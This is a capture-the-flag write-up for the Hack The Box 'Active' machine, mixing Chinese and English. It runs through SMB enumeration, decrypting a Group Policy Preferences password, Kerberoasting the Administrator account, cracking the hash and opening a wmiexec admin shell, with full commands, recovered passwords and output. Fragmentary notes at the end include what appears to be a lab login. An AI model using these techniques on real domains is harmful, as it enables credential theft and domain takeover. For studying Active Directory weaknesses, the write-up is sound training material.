Skip to content

HTB Active

![[Pasted image 20221004114359.png]]

SYNOPSIS

Skills Required

  • Active Directory 的身份验证(authentication)和共享文件夹(shared folders)的基本知识

Skills Learned

  • SMB 枚举技术
  • 组策略首选项 Groups.xml 枚举和利用
  • 识别和利用 Kerberoastable 帐户

Enumeration

端口扫描

masscan -p1-65535 10.129.125.59 --rate=1000 -e tun0 > ports
ports=$(cat ports | awk -F " " '{print $4}' | awk -F "/" '{print $1}' | sort -n | tr '\n' ',' | sed 's/,$//')

nmap -Pn -sV -sC -p$ports 10.129.125.59

PORT      STATE SERVICE       VERSION
53/tcp    open  domain        Microsoft DNS 6.1.7601 (1DB15D39) (Windows Server 2008 R2 SP1)
| dns-nsid: 
|_  bind.version: Microsoft DNS 6.1.7601 (1DB15D39)
88/tcp    open  kerberos-sec  Microsoft Windows Kerberos (server time: 2022-10-04 05:56:18Z)
135/tcp   open  msrpc         Microsoft Windows RPC
139/tcp   open  netbios-ssn   Microsoft Windows netbios-ssn
389/tcp   open  ldap          Microsoft Windows Active Directory LDAP (Domain: active.htb, Site: Default-First-Site-Name)
445/tcp   open  microsoft-ds?
464/tcp   open  kpasswd5?
593/tcp   open  ncacn_http    Microsoft Windows RPC over HTTP 1.0
636/tcp   open  tcpwrapped
3268/tcp  open  ldap          Microsoft Windows Active Directory LDAP (Domain: active.htb, Site: Default-First-Site-Name)
3269/tcp  open  tcpwrapped
5722/tcp  open  msrpc         Microsoft Windows RPC
9389/tcp  open  mc-nmf        .NET Message Framing
47001/tcp open  http          Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)
|_http-server-header: Microsoft-HTTPAPI/2.0
|_http-title: Not Found
49152/tcp open  msrpc         Microsoft Windows RPC
49153/tcp open  msrpc         Microsoft Windows RPC
49154/tcp open  msrpc         Microsoft Windows RPC
49155/tcp open  msrpc         Microsoft Windows RPC
49157/tcp open  ncacn_http    Microsoft Windows RPC over HTTP 1.0
49158/tcp open  msrpc         Microsoft Windows RPC
49165/tcp open  msrpc         Microsoft Windows RPC
49170/tcp open  msrpc         Microsoft Windows RPC
49172/tcp open  msrpc         Microsoft Windows RPC
Service Info: Host: DC; OS: Windows; CPE: cpe:/o:microsoft:windows_server_2008:r2:sp1, cpe:/o:microsoft:windows

Host script results:
| smb2-time: 
|   date: 2022-10-04T05:57:15
|_  start_date: 2022-10-04T03:40:06
| smb2-security-mode: 
|   2.1: 
|_    Message signing enabled and required


枚举445端口

$ nmap --script safe -p445 10.129.125.59
Starting Nmap 7.92 ( https://nmap.org ) at 2022-10-04 07:14 BST
Pre-scan script results:
|_hostmap-robtex: *TEMPORARILY DISABLED* due to changes in Robtex's API. See https://www.robtex.com/api/
|_http-robtex-shared-ns: *TEMPORARILY DISABLED* due to changes in Robtex's API. See https://www.robtex.com/api/
|_broadcast-wpad-discover: Failed to retrieve wpad.dat (http://wpad.com/wpad.dat) from server
| targets-asn: 
|_  targets-asn.asn is a mandatory parameter
Nmap scan report for active.htb (10.129.125.59)
Host is up (0.0042s latency).

PORT    STATE SERVICE
445/tcp open  microsoft-ds
|_smb-enum-services: ERROR: Script execution failed (use -d to debug)

Host script results:
| smb-mbenum: 
|_  ERROR: Failed to connect to browser service: Could not negotiate a connection:SMB: Failed to receive bytes: ERROR
|_clock-skew: 1s
|_fcrdns: FAIL (No PTR record)
|_msrpc-enum: Could not negotiate a connection:SMB: Failed to receive bytes: ERROR
| smb2-time: 
|   date: 2022-10-04T06:15:30
|_  start_date: 2022-10-04T03:40:06
| smb2-capabilities: 
|   2.0.2: 
|     Distributed File System
|   2.1: 
|     Distributed File System
|     Leasing
|_    Multi-credit operations
| dns-blacklist: 
|   SPAM
|     l2.apews.org - FAIL
|_    list.quorum.to - FAIL
| unusual-port: 
|_  WARNING: this script depends on Nmap's service/version detection (-sV)
| smb-protocols: 
|   dialects: 
|     2.0.2
|_    2.1
| port-states: 
|   tcp: 
|_    open: 445
| smb2-security-mode: 
|   2.1: 
|_    Message signing enabled and required

Post-scan script results:
| reverse-index: 
|_  445/tcp: 10.129.125.59

枚举SMB

$ smbmap.py -H  -u NopSec -p 'NopSec1234!' -d widgetworld -F '[1-9][0-9][0-9]-[0-9][0-9]-[0-9][0-9][0-9][0-9]'


$ smbclient -L //10.129.125.59
Enter WORKGROUP\htb-ovuln's password: 
Anonymous login successful

    Sharename       Type      Comment
    ---------       ----      -------
    ADMIN$          Disk      Remote Admin
    C$              Disk      Default share
    IPC$            IPC       Remote IPC
    NETLOGON        Disk      Logon server share 
    Replication     Disk      
    SYSVOL          Disk      Logon server share 
    Users           Disk      
SMB1 disabled -- no workgroup available

$ smbclient //$target/Replication
Enter WORKGROUP\htb-ovuln's password: 
Anonymous login successful
Try "help" to get a list of possible commands.
smb: \> 
smb: \> dir
  .                                   D        0  Sat Jul 21 11:37:44 2018
  ..                                  D        0  Sat Jul 21 11:37:44 2018
  active.htb                          D        0  Sat Jul 21 11:37:44 2018

        10459647 blocks of size 4096. 5203372 blocks available

$ smb: \> RECURSE ON
smb: \> PROMPT OFF
smb: \> mget *
getting file \active.htb\Policies\{31B2F340-016D-11D2-945F-00C04FB984F9}\GPT.INI of size 23 as active.htb/Policies/{31B2F340-016D-11D2-945F-00C04FB984F9}/GPT.INI (2.5 KiloBytes/sec) (average 2.5 KiloBytes/sec)
getting file \active.htb\Policies\{6AC1786C-016F-11D2-945F-00C04fB984F9}\GPT.INI of size 22 as active.htb/Policies/{6AC1786C-016F-11D2-945F-00C04fB984F9}/GPT.INI (2.7 KiloBytes/sec) (average 2.6 KiloBytes/sec)
getting file \active.htb\Policies\{31B2F340-016D-11D2-945F-00C04FB984F9}\Group Policy\GPE.INI of size 119 as active.htb/Policies/{31B2F340-016D-11D2-945F-00C04FB984F9}/Group Policy/GPE.INI (14.5 KiloBytes/sec) (average 6.4 KiloBytes/sec)
getting file \active.htb\Policies\{31B2F340-016D-11D2-945F-00C04FB984F9}\MACHINE\Registry.pol of size 2788 as active.htb/Policies/{31B2F340-016D-11D2-945F-00C04FB984F9}/MACHINE/Registry.pol (340.3 KiloBytes/sec) (average 87.4 KiloBytes/sec)
getting file \active.htb\Policies\{31B2F340-016D-11D2-945F-00C04FB984F9}\MACHINE\Preferences\Groups\Groups.xml of size 533 as active.htb/Policies/{31B2F340-016D-11D2-945F-00C04FB984F9}/MACHINE/Preferences/Groups/Groups.xml (65.1 KiloBytes/sec) (average 83.0 KiloBytes/sec)
getting file \active.htb\Policies\{31B2F340-016D-11D2-945F-00C04FB984F9}\MACHINE\Microsoft\Windows NT\SecEdit\GptTmpl.inf of size 1098 as active.htb/Policies/{31B2F340-016D-11D2-945F-00C04FB984F9}/MACHINE/Microsoft/Windows NT/SecEdit/GptTmpl.inf (107.2 KiloBytes/sec) (average 87.8 KiloBytes/sec)
getting file \active.htb\Policies\{6AC1786C-016F-11D2-945F-00C04fB984F9}\MACHINE\Microsoft\Windows NT\SecEdit\GptTmpl.inf of size 3722 as active.htb/Policies/{6AC1786C-016F-11D2-945F-00C04fB984F9}/MACHINE/Microsoft/Windows NT/SecEdit/GptTmpl.inf (454.3 KiloBytes/sec) (average 137.5 KiloBytes/sec)

smbmap 可以 Groups.xml 文件为目标

$ smbmap -R Replication -H 10.129.125.59 -A Groups.xml -q

mount 更强大的枚举

sudo apt install cifs-utils
mkdir /mnt/Replication
mount -t cifs //10.129.125.59/Replication /mnt/Replication -o
username=<username>,password=<password>,domain=active.htb
grep -R password /mnt/Replication

SYSVOL副本 存储组策略 提权 提取Groups.xml --IppSec

将 RECURSE 设置为ON 将 PROMPT 设置为OFF

组策略首选项(Group Policy Preferences)

Windows Server 2008 引入,允许管理员在网络中修改用户和组 利用示例 强密码被AES-256加密并存储在Groups.xml中 ?(翻译为理解)但2012年微软在MSDN上发布了AES密钥,意味着使用GPP设置的密码现在很容易被破解

$ cat Groups.xml 
<?xml version="1.0" encoding="utf-8"?>
<Groups clsid="{3125E937-EB16-4b4c-9934-544FC6D24D26}"><User clsid="{DF5F1855-51E5-4d24-8B1A-D9BDE98BA1D1}" name="active.htb\SVC_TGS" image="2" changed="2018-07-18 20:46:06" uid="{EF57DA28-5F69-4530-A59E-AAB58578219D}"><Properties action="U" newName="" fullName="" description="" cpassword="edBSHOwhZLTjt/QS9FeIcJ83mjWA98gw9guKOhJOdcqh+ZGMeXOsQbCpZ3xUjTLfCuNH8pG5aSVYdYw/NglVmQ" changeLogon="0" noChange="1" neverExpires="1" acctDisabled="0" userName="active.htb\SVC_TGS"/></User>
</Groups>

$ gpp-decrypt edBSHOwhZLTjt/QS9FeIcJ83mjWA98gw9guKOhJOdcqh+ZGMeXOsQbCpZ3xUjTLfCuNH8pG5aSVYdYw/NglVmQ
GPPstillStandingStrong2k18

Authenticated Enumeration

使用 active.htb 域的有效凭据,可以进行进一步枚举。SYSVOL和Users 共享现在可以访问 ldapsearch 可用于查询活动账户的 Active Directory UserAccountControl 属性的域控制器,以及可能应用于它们的其他特定配置。许多 UserAccountControl 也具有安全相关性。可能的UserAccountControl 2 的值对应于禁用的账户状态,因此下面的查询返回 active.htb 域中的活跃用户 (by sAMAccountName / username)

$ ldapsearch -x -h 10.129.241.119 -p 389 -D 'SVC_TGS' -w 'GPPstillStandingStrong2k18' -b "dc=active,dc=htb" -s sub "(&(objectCategory=person)(objectClass=user)(!(useraccountcontrol:1.2.840.113556.1.4.803:=2)))" samaccountname | grep sAMAccountName
sAMAccountName: Administrator
sAMAccountName: SVC_TGS

ImpacketGetADUsers.py 简化了枚举域用户账户的过程。

$ GetADUsers.py -all active.htb/svc_tgs -dc-ip $target
Impacket v0.9.22 - Copyright 2020 SecureAuth Corporation

Password:
[*] Querying 10.129.241.119 for information about domain.
Name                  Email                           PasswordLastSet      LastLogon           
--------------------  ------------------------------  -------------------  -------------------
Administrator                                         2018-07-18 20:06:40.351723  2022-10-07 04:16:04.670904 
Guest                                                 <never>              <never>             
krbtgt                                                2018-07-18 19:50:36.972031  <never>             
SVC_TGS                                               2018-07-18 21:14:38.402764  2022-10-07 06:05:45.308462

Exploitation

Kerberoasting

Kerberos 身份验证和服务主体名称 "Kerberoasting"用于在 Active Directory 域中作权限提升 从Kerberos "Ticket Granting Service" 票证回复(TGS_REP)中提取加密材料的哈希值,对其进行离线破解以检索明文密码。因为 TGS_REP 的服务实例在其上下文中运行的账户的名称使用的是NTLM 加密哈希的。 ![[Pasted image 20221007134730.png]]

托管服务账户由于密码的复杂性而降低了这种风险,但他们在许多环境中并未积极使用。关闭服务器托管服务并不能缓解,因为攻击不涉及与目标的通信服务。因此,定期审核所有账户启用的目的和权限非常重要。 Kerberos 身份验证使用服务主体名称(SPN)来识别与特定服务实例关联的账户。ldapsearch 可用于识别配置了SPN的账户。

$ ldapsearch -x -h $target -p 389 -D 'SVC_TGS' -w 'GPPstillStandingStrong2k18' -b "dc=active,dc=htb" -s sub "(&(objectCategory=person)(objectClass=user)(!(useraccountcontrol:1.2.840.113556.1.4.803:=2))(serviceprincipalname=*/*))" serviceprincipalname | grep -B 1 servicePrincipalName
dn: CN=Administrator,CN=Users,DC=active,DC=htb
servicePrincipalName: active/CIFS:445

active\Administrator 似乎已经配置了 SPN ImpacketGetUserSPNs.py 再次简化了此过程,还能够请求 TGS 并提取散列进行离线破解。

$ GetUserSPNs.py active.htb/svc_tgs -dc-ip $target
Impacket v0.9.22 - Copyright 2020 SecureAuth Corporation

Password:
ServicePrincipalName  Name           MemberOf                                                  PasswordLastSet             LastLogon                   Delegation 
--------------------  -------------  --------------------------------------------------------  --------------------------  --------------------------  ----------
active/CIFS:445       Administrator  CN=Group Policy Creator Owners,CN=Users,DC=active,DC=htb  2018-07-18 20:06:40.351723  2022-10-07 04:16:04.670904

$ GetUserSPNs.py active.htb/svc_tgs -dc-ip $target -request
Impacket v0.9.22 - Copyright 2020 SecureAuth Corporation

Password:
ServicePrincipalName  Name           MemberOf                                                  PasswordLastSet             LastLogon                   Delegation 
--------------------  -------------  --------------------------------------------------------  --------------------------  --------------------------  ----------
active/CIFS:445       Administrator  CN=Group Policy Creator Owners,CN=Users,DC=active,DC=htb  2018-07-18 20:06:40.351723  2022-10-07 04:16:04.670904             

$krb5tgs$23$*Adminis<SNIP>

Cracking of Kerberos TGS Hash

使用 hashcatjohn 很容易破解 active\administrator 的密码

$ hashcat -m 13100 hashes.txt /usr/share/wordlists/rockyou.txt --force --potfile-disable

<SNIP>ff9726:Ticketmaster1968

$ john --format:krb5tgs hash.txt --wordlist=/usr/share/wordlists/rockyou.txt
Created directory: /home/htb-ovuln/.john
Using default input encoding: UTF-8
Loaded 1 password hash (krb5tgs, Kerberos 5 TGS etype 23 [MD4 HMAC-MD5 RC4])
Will run 4 OpenMP threads
Press 'q' or Ctrl-C to abort, almost any other key for status
Ticketmaster1968 (?)
<SNIP>

获取 Primary Domain Admin shell

Impacketwmiexec.py 可以获得 active\administrator 的shell

$ wmiexec.py active/administrator:Ticketmaster1968@$target
Impacket v0.9.22 - Copyright 2020 SecureAuth Corporation

[*] SMBv2.1 dialect used
[!] Launching semi-interactive shell - Careful what you execute
[!] Press help for extra shell commands
C:\>whoami
active\administrator
C:\>more C:\Users\administrator\Desktop\root.txt

Bonus: The "Old School(老派)" Kerberoasting Technique(技术)

Windows 和 Linux 有多种 kerberoasting 方法,下面复制了 Tim Medin 的原始 Kerberoasting 技术,该技术利用 Benjamin Delpy 的 Mimikatz 中的功能来导出 Kerberos 票证。

域计算机上可以使用内置实用程序 setspn.exe 枚举可用的SPN和关联账户

> whoami
avtive\svc_tgs

> setspn -T active.htb -F -Q */*

请求并从RAM

SYSVOL Active Directory 中所有身份验证的用户都具有读取权限的域范围共享。包含登陆脚本,组策略数据 利用组策略首选项

域组策略存储位置: \\<DOMAIN>\SYSVOL\<DOMAIN>\Policies\

记录

sysvolzhong dde ping zheng

挖掘 SYSVOL 获取凭证

10.129.227.164

htb-ovuln@htb-sda3amjbjo.htb-cloud.com W6AYrtug

Service Principal Names|服务主体名称
service instance|服务实例